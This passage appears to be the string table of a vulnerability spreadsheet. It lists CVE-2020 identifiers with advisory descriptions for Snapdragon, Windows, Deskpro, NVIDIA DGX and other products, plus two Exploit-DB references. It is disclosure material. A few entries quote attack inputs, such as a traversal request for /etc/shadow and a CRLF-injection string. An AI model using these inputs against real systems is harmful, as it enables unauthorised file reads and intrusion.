    <t>Denial of service while processing fine timing measurement request (FTMR) frame with reserved bits set in the FTM parameter IE due to improper error handling in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11281</t>
  </si>
  <si>
    <t>Allowing RTT frames to be linked with non randomized MAC address by comparing the sequence numbers can lead to information disclosure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11282</t>
  </si>
  <si>
    <t>Improper access control when using mmap with the kgsl driver with a special offset value that can be provided to map the memstore of the GPU to user space in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11283</t>
  </si>
  <si>
    <t>A buffer overflow can occur when playing an MKV clip due to lack of input validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11284</t>
  </si>
  <si>
    <t>Locked memory can be unlocked and modified by non secure boot loader through improper system call sequence making the memory region untrusted source of input for secure boot loader in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11285</t>
  </si>
  <si>
    <t>Buffer over-read while unpacking the RTCP packet we may read extra byte if wrong length is provided in RTCP packets in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11286</t>
  </si>
  <si>
    <t>An Untrusted Pointer Dereference can occur while doing USB control transfers, if multiple requests of different standard request categories like device, interface &amp; endpoint are made together. in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11287</t>
  </si>
  <si>
    <t>CVE-2020-11288</t>
  </si>
  <si>
    <t>Out of bound write can occur in playready while processing command due to lack of input validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11289</t>
  </si>
  <si>
    <t>Out of bound write can occur in TZ command handler due to lack of validation of command ID in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1129</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1319.</t>
  </si>
  <si>
    <t>CVE-2020-11290</t>
  </si>
  <si>
    <t>Use after free condition in msm ioctl events due to race between the ioctl register and deregister events in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11291</t>
  </si>
  <si>
    <t>Possible buffer overflow while updating ikev2 parameters for delete payloads received during informational exchange due to lack of check of input validation for certain parameters received from the ePDG server in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11292</t>
  </si>
  <si>
    <t>Possible buffer overflow in voice service due to lack of input validation of parameters in QMI Voice API in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11293</t>
  </si>
  <si>
    <t>Out of bound read can happen in Widevine TA while copying data to buffer from user data due to lack of check of buffer length received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11294</t>
  </si>
  <si>
    <t>Out of bound write in logger due to prefix size is not validated while prepended to logging string in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11295</t>
  </si>
  <si>
    <t>Use after free in camera If the threadmanager is being cleaned up while the worker thread is processing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11296</t>
  </si>
  <si>
    <t>Arithmetic overflow can happen while processing NOA IE due to improper error handling in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11297</t>
  </si>
  <si>
    <t>Denial of service in WLAN module due to improper check of subtypes in logic where excessive frames are dropped in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11298</t>
  </si>
  <si>
    <t>While waiting for a response to a callback or listener request, non-secure clients can change permissions to shared memory buffers used by HLOS Invoke Call to secure kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11299</t>
  </si>
  <si>
    <t>Buffer overflow can occur in video while playing the non-standard clip in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1130</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles data operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1133.</t>
  </si>
  <si>
    <t>CVE-2020-11301</t>
  </si>
  <si>
    <t>Improper authentication of un-encrypted plaintext Wi-Fi frames in an encrypted network can lead to information disclosure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t>
  </si>
  <si>
    <t>CVE-2020-11303</t>
  </si>
  <si>
    <t>Accepting AMSDU frames with mismatched destination and source address can lead to information disclosure in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11304</t>
  </si>
  <si>
    <t>Possible out of bound read in DRM due to improper buffer length check. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11305</t>
  </si>
  <si>
    <t>Integer overflow in boot due to improper length check on arguments received in Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11306</t>
  </si>
  <si>
    <t>Possible integer overflow in RPMB counter due to lack of length check on user provided data in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11307</t>
  </si>
  <si>
    <t>Buffer overflow in modem due to improper array index check before copying into it in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11308</t>
  </si>
  <si>
    <t>Buffer overflow occurs when trying to convert ASCII string to Unicode string if the actual size is more than required in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11309</t>
  </si>
  <si>
    <t>Use after free in GPU driver while mapping the user memory to GPU memory due to improper check of referenced memory in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1131</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-1132</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles file and folder links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1133</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1130.</t>
  </si>
  <si>
    <t>CVE-2020-1134</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-1135</t>
  </si>
  <si>
    <t>CVE-2020-1136</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1150.</t>
  </si>
  <si>
    <t>CVE-2020-1137</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory, aka 'Windows Push Notification Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1138</t>
  </si>
  <si>
    <t>CVE-2020-1139</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-1140</t>
  </si>
  <si>
    <t>CVE-2020-1141</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1145, CVE-2020-1179.</t>
  </si>
  <si>
    <t>CVE-2020-11414</t>
  </si>
  <si>
    <t>An issue was discovered in Progress Telerik UI for Silverlight before 2020.1.330. The RadUploadHandler class in RadUpload for Silverlight expects a web request that provides the file location of the uploading file along with a few other parameters. The uploading file location should be inside the directory where the upload handler class is defined. Before 2020.1.330, a crafted web request could result in uploads to arbitrary locations.</t>
  </si>
  <si>
    <t>CVE-2020-11415</t>
  </si>
  <si>
    <t>An issue was discovered in Sonatype Nexus Repository Manager 2.x before 2.14.17 and 3.x before 3.22.1. Admin users can retrieve the LDAP server system username/password (as configured in nxrm) in cleartext.</t>
  </si>
  <si>
    <t>CVE-2020-11416</t>
  </si>
  <si>
    <t>JetBrains Space through 2020-04-22 allows stored XSS in Chats.</t>
  </si>
  <si>
    <t>CVE-2020-1142</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, aka 'Windows GDI Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11420</t>
  </si>
  <si>
    <t>UPS Adapter CS141 before 1.90 allows Directory Traversal. An attacker with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that reference files and by doing this achieve access to files and directories outside the web root folder. An attacker may access arbitrary files and directories stored in the file system, but integrity of the files are not jeopardized as attacker have read access rights only.</t>
  </si>
  <si>
    <t>CVE-2020-1143</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1054.</t>
  </si>
  <si>
    <t>CVE-2020-11431</t>
  </si>
  <si>
    <t>The documentation component in i-net Clear Reports 16.0 to 19.2, HelpDesk 8.0 to 8.3, and PDFC 4.3 to 6.2 allows a remote unauthenticated attacker to read arbitrary system files and directories on the target server via Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-11436</t>
  </si>
  <si>
    <t>LibreHealth EMR v2.0.0 is vulnerable to XSS that results in the ability to force arbitrary actions on behalf of other users including administrators.</t>
  </si>
  <si>
    <t>CVE-2020-11437</t>
  </si>
  <si>
    <t>LibreHealth EMR v2.0.0 is affected by SQL injection allowing low-privilege authenticated users to enumerate the database.</t>
  </si>
  <si>
    <t>CVE-2020-11438</t>
  </si>
  <si>
    <t>LibreHealth EMR v2.0.0 is affected by systemic CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-11439</t>
  </si>
  <si>
    <t>LibreHealth EMR v2.0.0 is affected by a Local File Inclusion issue allowing arbitrary PHP to be included and executed within the EMR application.</t>
  </si>
  <si>
    <t>CVE-2020-1144</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11440</t>
  </si>
  <si>
    <t>httpRpmFs in WebCLI in Wind River VxWorks 5.5 through 7 SR0640 has no check for an escape from the web root.</t>
  </si>
  <si>
    <t>CVE-2020-11441</t>
  </si>
  <si>
    <t>** DISPUTED ** phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states "I don't see anything specifically exploitable."</t>
  </si>
  <si>
    <t>CVE-2020-11443</t>
  </si>
  <si>
    <t>The Zoom IT installer for Windows (ZoomInstallerFull.msi) prior to version 4.6.10 deletes files located in %APPDATA%\Zoom before installing an updated version of the client. Standard users are able to write to this directory, and can write links to other directories on the machine. As the installer runs with SYSTEM privileges and follows these links, a user can cause the installer to delete files that otherwise cannot be deleted by the user.</t>
  </si>
  <si>
    <t>CVE-2020-11444</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager 3.x up to and including 3.21.2 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-11445</t>
  </si>
  <si>
    <t>TP-Link cloud cameras through 2020-02-09 allow remote attackers to bypass authentication and obtain sensitive information via vectors involving a Wi-Fi session with GPS enabled, aka CNVD-2020-04855.</t>
  </si>
  <si>
    <t>CVE-2020-11446</t>
  </si>
  <si>
    <t>ESET Antivirus and Antispyware Module module 1553 through 1560 allows a user with limited access rights to create hard links in some ESET directories and then force the product to write through these links into files that would normally not be write-able by the user, thus achieving privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-11449</t>
  </si>
  <si>
    <t>An issue was discovered on Technicolor TC7337 8.89.17 devices. An attacker can discover admin credentials in the backup file, aka backupsettings.conf.</t>
  </si>
  <si>
    <t>CVE-2020-1145</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1179.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48289.txt</t>
  </si>
  <si>
    <t>LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-11450</t>
  </si>
  <si>
    <t>Microstrategy Web 10.4 exposes the JVM configuration, CPU architecture, installation folder, and other information through the URL /MicroStrategyWS/happyaxis.jsp. An attacker could use this vulnerability to learn more about the environment the application is running in. This issue has been mitigated in all versions of the product 11.0 and higher.</t>
  </si>
  <si>
    <t>CVE-2020-11451</t>
  </si>
  <si>
    <t>The Upload Visualization plugin in the Microstrategy Web 10.4 admin panel allows an administrator to upload a ZIP archive containing files with arbitrary extensions and data. (This is also exploitable via SSRF). Note: The ability to upload visualization plugins requires administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11452</t>
  </si>
  <si>
    <t>Microstrategy Web 10.4 includes functionality to allow users to import files or data from external resources such as URLs or databases. By providing an external URL under attacker control, it's possible to send requests to external resources (aka SSRF) or leak files from the local system using the file:// stream wrapper.</t>
  </si>
  <si>
    <t>CVE-2020-11453</t>
  </si>
  <si>
    <t>** DISPUTED ** Microstrategy Web 10.4 is vulnerable to Server-Side Request Forgery in the Test Web Service functionality exposed through the path /MicroStrategyWS/. The functionality requires no authentication and, while it is not possible to pass parameters in the SSRF request, it is still possible to exploit it to conduct port scanning. An attacker could exploit this vulnerability to enumerate the resources allocated in the network (IP addresses and services exposed). NOTE: MicroStrategy is unable to reproduce the issue reported in any version of its product.</t>
  </si>
  <si>
    <t>CVE-2020-11454</t>
  </si>
  <si>
    <t>Microstrategy Web 10.4 is vulnerable to Stored XSS in the HTML Container and Insert Text features in the window, allowing for the creation of a new dashboard. In order to exploit this vulnerability, a user needs to get access to a shared dashboard or have the ability to create a dashboard on the application.</t>
  </si>
  <si>
    <t>CVE-2020-11455</t>
  </si>
  <si>
    <t>LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.</t>
  </si>
  <si>
    <t>CVE-2020-11456</t>
  </si>
  <si>
    <t>LimeSurvey before 4.1.12+200324 has stored XSS in application/views/admin/surveysgroups/surveySettings.php and application/models/SurveysGroups.php (aka survey groups).</t>
  </si>
  <si>
    <t>CVE-2020-11457</t>
  </si>
  <si>
    <t>pfSense before 2.4.5 has stored XSS in system_usermanager_addprivs.php in the WebGUI via the descr parameter (aka full name) of a user.</t>
  </si>
  <si>
    <t>CVE-2020-11458</t>
  </si>
  <si>
    <t>app/Model/feed.php in MISP before 2.4.124 allows administrators to choose arbitrary files that should be ingested by MISP. This does not cause a leak of the full contents of a file, but does cause a leaks of strings that match certain patterns. Among the data that can leak are passwords from database.php or GPG key passphrases from config.php.</t>
  </si>
  <si>
    <t>CVE-2020-1146</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0766.</t>
  </si>
  <si>
    <t>CVE-2020-11462</t>
  </si>
  <si>
    <t>An issue was discovered in OpenVPN Access Server before 2.7.0 and 2.8.x before 2.8.3. With the full featured RPC2 interface enabled, it is possible to achieve a temporary DoS state of the management interface when sending an XML Entity Expansion (XEE) payload to the XMLRPC based RPC2 interface. The duration of the DoS state depends on available memory and CPU speed. The default restricted mode of the RPC2 interface is NOT vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-11463</t>
  </si>
  <si>
    <t>An issue was discovered in Deskpro before 2019.8.0. The /api/email_accounts endpoint failed to properly validate a user's privilege, allowing an attacker to retrieve cleartext credentials of all helpdesk email accounts, including incoming and outgoing email credentials. This enables an attacker to get full access to all emails sent or received by the system including password reset emails, making it possible to reset any user's password.</t>
  </si>
  <si>
    <t>CVE-2020-11464</t>
  </si>
  <si>
    <t>An issue was discovered in Deskpro before 2019.8.0. The /api/people endpoint failed to properly validate a user's privilege, allowing an attacker to retrieve sensitive information about all users registered on the system. This includes their full name, privilege, email address, phone number, etc.</t>
  </si>
  <si>
    <t>CVE-2020-11465</t>
  </si>
  <si>
    <t>An issue was discovered in Deskpro before 2019.8.0. The /api/apps/* endpoints failed to properly validate a user's privilege, allowing an attacker to control/install helpdesk applications and leak current applications' configurations, including applications used as user sources (used for authentication). This enables an attacker to forge valid authentication models that resembles any user on the system.</t>
  </si>
  <si>
    <t>CVE-2020-11466</t>
  </si>
  <si>
    <t>An issue was discovered in Deskpro before 2019.8.0. The /api/tickets endpoint failed to properly validate a user's privilege, allowing an attacker to retrieve arbitrary information about all helpdesk tickets stored in database with numerous filters. This leaked sensitive information to unauthorized parties. Additionally, it leaked ticket authentication code, making it possible to make changes to a ticket.</t>
  </si>
  <si>
    <t>CVE-2020-11467</t>
  </si>
  <si>
    <t>An issue was discovered in Deskpro before 2019.8.0. This product enables administrators to modify the helpdesk interface by editing /portal/api/style/edit-theme-set/template-sources theme templates, and uses TWIG as its template engine. While direct access to self and _self variables was not permitted, one could abuse the accessible variables in one's context to reach a native unserialize function via the code parameter. There, on could pass a crafted payload to trigger a set of POP gadgets in order to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11469</t>
  </si>
  <si>
    <t>Zoom Client for Meetings through 4.6.8 on macOS copies runwithroot to a user-writable temporary directory during installation, which allows a local process (with the user's privileges) to obtain root access by replacing runwithroot.</t>
  </si>
  <si>
    <t>CVE-2020-1147</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/aspx/webapps/50151.py</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server 2019 - Remote Code Execution (2)</t>
  </si>
  <si>
    <t>2021-07-23</t>
  </si>
  <si>
    <t>CVE-2020-11470</t>
  </si>
  <si>
    <t>Zoom Client for Meetings through 4.6.8 on macOS has the disable-library-validation entitlement, which allows a local process (with the user's privileges) to obtain unprompted microphone and camera access by loading a crafted library and thereby inheriting Zoom Client's microphone and camera access.</t>
  </si>
  <si>
    <t>CVE-2020-11474</t>
  </si>
  <si>
    <t>NCP Secure Enterprise Client before 10.15 r47589 allows a symbolic link attack on enumusb.reg via Support Assistant.</t>
  </si>
  <si>
    <t>CVE-2020-11476</t>
  </si>
  <si>
    <t>Concrete5 before 8.5.3 allows Unrestricted Upload of File with Dangerous Type such as a .phar file.</t>
  </si>
  <si>
    <t>CVE-2020-1148</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1289.</t>
  </si>
  <si>
    <t>CVE-2020-11483</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contains a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11484</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contains a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11485</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contains a Cross-Site Request Forgery (CSRF) vulnerability in the AMI BMC firmware in which the web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request, which can lead to information disclosure or code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11486</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30, contain a vulnerability in the AMI BMC firmware in which software allows an attacker to upload or transfer files that can be automatically processed within the product's environment, which may lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11487</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, DGX-1 with BMC firmware versions prior to 3.38.30. DGX-2 with BMC firmware versions prior to 1.06.06 and all DGX A100 Servers with all BMC firmware versions, contains a vulnerability in the AMI BMC firmware in which the use of a hard-coded RSA 1024 key with weak ciphers may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11488</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contains a vulnerability in the AMI BMC firmware in which software does not validate the RSA 1024 public key used to verify the firmware signature, which may lead to information disclosure or code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11489</t>
  </si>
  <si>
    <t>NVIDIA DGX servers, all DGX-1 with BMC firmware versions prior to 3.38.30 and all DGX-2 with BMC firmware versions prior to 1.06.06, contain a vulnerability in the AMI BMC firmware in which default SNMP community strings are used, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1149</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11490</t>
  </si>
  <si>
    <t>Manage::Certificates in Zen Load Balancer 3.10.1 allows remote authenticated admins to execute arbitrary OS commands via shell metacharacters in the index.cgi cert_issuer, cert_division, cert_organization, cert_locality, cert_state, cert_country, or cert_email parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11491</t>
  </si>
  <si>
    <t>Monitoring::Logs in Zen Load Balancer 3.10.1 allows remote authenticated admins to conduct absolute path traversal attacks, as demonstrated by a filelog=/etc/shadow request to index.cgi.</t>
  </si>
  <si>
    <t>CVE-2020-11492</t>
  </si>
  <si>
    <t>An issue was discovered in Docker Desktop through 2.2.0.5 on Windows. If a local attacker sets up their own named pipe prior to starting Docker with the same name, this attacker can intercept a connection attempt from Docker Service (which runs as SYSTEM), and then impersonate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11493</t>
  </si>
  <si>
    <t>In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can obtain sensitive information about an uninitialized object because of direct transformation from PDF Object to Stream without concern for a crafted XObject.</t>
  </si>
  <si>
    <t>CVE-2020-11494</t>
  </si>
  <si>
    <t>An issue was discovered in slc_bump in drivers/net/can/slcan.c in the Linux kernel 3.16 through 5.6.2. It allows attackers to read uninitialized can_frame data, potentially containing sensitive information from kernel stack memory, if the configuration lacks CONFIG_INIT_STACK_ALL, aka CID-b9258a2cece4.</t>
  </si>
  <si>
    <t>CVE-2020-11496</t>
  </si>
  <si>
    <t>Sprecher SPRECON-E firmware prior to 8.64b might allow local attackers with access to engineering data to insert arbitrary code. This firmware lacks the validation of the input values on the device side, which is provided by the engineering software during parameterization. Attackers with access to local configuration files can therefore insert malicious commands that are executed after compiling them to valid parameter files (“PDLs”), transferring them to the device, and restarting the device.</t>
  </si>
  <si>
    <t>CVE-2020-11497</t>
  </si>
  <si>
    <t>An issue was discovered in the NAB Transact extension 2.1.0 for the WooCommerce plugin for WordPress. An online payment system bypass allows orders to be marked as fully paid by assigning an arbitrary bank transaction ID during the payment-details entry step.</t>
  </si>
  <si>
    <t>CVE-2020-11498</t>
  </si>
  <si>
